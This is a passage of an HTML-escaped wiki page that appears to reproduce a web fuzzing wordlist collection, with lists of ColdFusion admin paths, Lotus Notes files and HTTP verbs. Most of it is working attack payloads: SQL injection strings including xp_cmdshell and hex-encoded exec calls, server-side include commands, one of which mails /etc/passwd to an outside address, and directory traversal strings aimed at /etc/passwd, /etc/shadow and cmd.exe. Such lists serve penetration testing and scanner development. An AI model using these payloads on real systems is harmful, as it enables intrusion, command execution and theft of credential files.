.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
